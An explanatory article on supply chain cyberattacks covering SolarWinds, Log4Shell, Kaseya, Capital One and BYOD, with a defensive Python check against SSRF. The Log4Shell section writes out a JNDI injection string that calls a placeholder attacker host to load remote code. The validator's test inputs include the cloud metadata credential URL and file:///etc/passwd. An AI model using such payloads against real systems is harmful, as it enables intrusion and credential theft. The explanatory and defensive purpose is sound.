September 21, 2022
Supply chain cyber threats are one of the fastest-growing risk areas for businesses of every size, because attackers have learned that the easiest way into a well-defended company is often through the software, services and devices it depends on. This article looks at five incidents and trends that show how a business becomes vulnerable through its supply chain.
The SolarWinds SUNBURST Backdoor
SUNBURST was a backdoor inserted into SolarWinds' Orion network monitoring platform. The attackers compromised SolarWinds' build environment so that the backdoor was compiled into a legitimate Orion library, which SolarWinds then code-signed and shipped to customers as a routine update in 2020. After installation the backdoor stayed dormant for up to two weeks, checked that it was not running in an analysis environment, and only then contacted its command-and-control infrastructure. From there the operators could run commands, transfer and execute files, profile the system, reboot it and disable services, all from a process administrators trusted because it came from their monitoring vendor.
The operation was attributed by the US government to Russia's SVR intelligence service, and the public detail comes from incident analyses and indicators published by FireEye, Microsoft and others rather than from the authors sharing their code. The supply chain lesson is that a valid vendor signature proves only that the vendor built the file, not that what the vendor built was clean; the integrity of the vendor's build pipeline is part of every customer's attack surface.
Log4Shell / Log4j Exploit and Open Source Software Vulnerabilities
Log4j is a widely used open-source logging library for Java maintained by the Apache Software Foundation, and Log4Shell is the name given to a critical vulnerability in it, CVE-2021-44228, disclosed in December 2021. Log4j 2 expands lookup expressions of the form ${prefix:key} inside the strings it logs, and one supported prefix, jndi, performs a JNDI lookup against an address taken from the string itself.
The flaw was reported to Apache by Chen Zhaojun of Alibaba Cloud's security team. Anyone who can get a string of their choosing into a log message, for example through an HTTP User-Agent header, a username or a chat message, can include ${jndi:ldap://attacker-host/x}; a vulnerable Log4j then connects to the attacker's server and can be made to load and run a remote Java class, giving remote code execution inside the logging application.
Because logging untrusted input is universal and Log4j is buried in countless products and transitive dependencies, the attacker gets whatever the application can reach: its data, its filesystem and its network position. The fix is to upgrade to a patched release (2.17.1 or later on the 2.x line) and, since many organizations did not know they shipped Log4j at all, to inventory dependencies with a software bill of materials so the next library-level flaw can be located quickly.
Kaseya VSA Attack and Managed Service Provider Ransomware
Kaseya VSA is remote monitoring and management (RMM) software that managed service providers (MSPs) use to administer their customers' machines. VSA agents installed on customer endpoints accept software and configuration pushes from the VSA server, so whoever controls the server can run code on every managed endpoint below it.
In July 2021 the REvil ransomware group exploited a chain of zero-day vulnerabilities in on-premises VSA servers (Kaseya's advisory lists CVE-2021-30116, a credential leak and business logic flaw, among them) that the Dutch Institute for Vulnerability Disclosure had privately reported and that were still unpatched, and took control of MSPs' VSA servers.
They then used VSA's own agent update mechanism to push a malicious payload disguised as a hotfix to managed endpoints, encrypting systems at up to about 1,500 downstream businesses. The weakness was not a single Kaseya database or remote access protocol; it was that one trusted management channel, once compromised, reached every customer of every affected MSP at once, and the endpoint security tooling was configured to trust what the agent delivered.
The Capital One Attack and Cloud Infrastructure Security Flaws
The 2019 Capital One breach exposed the personal data of roughly 100 million people in the United States and about 6 million in Canada, drawn from credit card applications and accounts going back years.
Capital One ran a web application firewall on an AWS EC2 instance, and a misconfiguration in it allowed server-side request forgery (SSRF): the attacker could make the WAF host issue HTTP requests to addresses of her choosing. She pointed it at the EC2 instance metadata service at 169.254.169.254, which returned temporary credentials for the IAM role attached to the instance. That role had permission to list and read a large number of S3 buckets, so the attacker used the credentials to copy the data out. The cloud lesson is twofold: an internet-facing application must not be able to fetch the metadata endpoint on its own host, and the role attached to a machine should carry only the permissions that machine actually needs.
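The following Python function is an added example written for this article, not Capital One's code or any AWS-provided library. It shows the server-side check a request-fetching feature should apply before it follows a caller-supplied URL: resolve the host, and refuse if any resulting address is link-local (the 169.254.0.0/16 range that carries the instance metadata service), loopback or private, including IPv4 addresses smuggled inside IPv6 mapped notation. The DNS table and the 203.0.113.x addresses are constructed so the example runs offline; a real deployment would use the system resolver and connect to the exact address it validated.

```python
import ipaddress
from urllib.parse import urlparse

# Address ranges an application server should never be tricked into fetching.
# 169.254.0.0/16 is the link-local range that carries the AWS instance
# metadata service (169.254.169.254), the target in the Capital One case.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed stand-in for DNS so the example runs offline (hypothetical names).
# "dual.example.com" shows a host that also resolves to a mapped metadata address.
FAKE_DNS = {
    "partner.example.com": ["203.0.113.10"],
    "metadata.internal.example": ["169.254.169.254"],
    "dual.example.com": ["203.0.113.11", "::ffff:169.254.169.254"],
}


def resolve(host):
    """Return the addresses for host: a literal IP as-is, otherwise from FAKE_DNS."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host, [])


def is_blocked_address(addr):
    """True if addr falls in a range the server must not fetch from."""
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so the IPv4 ranges still apply.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_outbound_url(url, resolver=resolve):
    """Return (allowed, reason) for a URL the server has been asked to fetch.

    Every address the host resolves to must pass; one bad address rejects the
    whole request, which is what defeats a name that mixes public and internal
    answers. The caller must then connect to a validated address, not re-resolve.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    addrs = resolver(host)
    if not addrs:
        return False, "host does not resolve: %s" % host
    for addr in addrs:
        if is_blocked_address(addr):
            return False, "%s resolves to blocked address %s" % (host, addr)
    return True, "ok"


if __name__ == "__main__":
    for candidate in (
        "https://partner.example.com/report",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://dual.example.com/",
        "file:///etc/passwd",
    ):
        print(candidate, "->", check_outbound_url(candidate))
```

The allow-list on the scheme and the deny-list on resolved addresses are the application-side half of the defence. The platform-side half is to require IMDSv2 on the instance, which only hands out credentials after a session token is obtained with a PUT request carrying a custom header, something a GET-based SSRF through a proxy or WAF cannot produce, and to keep the instance role's policy down to the buckets it genuinely needs.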
Bring Your Own Device (BYOD) Vulnerabilities and Vendor Devices
Bring Your Own Device (BYOD) programs let employees use personal phones and laptops for work, and with them come endpoints the business did not build, does not patch and often cannot monitor. Many businesses likewise rely on the vendors that supply their managed devices to keep the operating system, firmware and pre-installed software secure.
Either way the security of the endpoint rests on a third party: the employee who decides when to update a personal phone, or the vendor whose update channel and bundled software the business trusts by default. A compromised device carries corporate credentials and data across every network its owner joins, and a vendor's update mechanism is itself a supply chain that can be hijacked, just as the SolarWinds and Kaseya cases show for software. Mobile device management, per-device access policies and refusing access to devices running outdated OS versions limit the exposure.
The supply chain is essential to every business, and cybercriminals and state-backed actors have learned to use it to deliver malware and steal data at scale. The five cases discussed here are only some of the ways a supply chain attack reaches its target; what they share is a trusted channel, whether a signed update, a logging library, a management server, a cloud role or a personal device, that was trusted further than it deserved.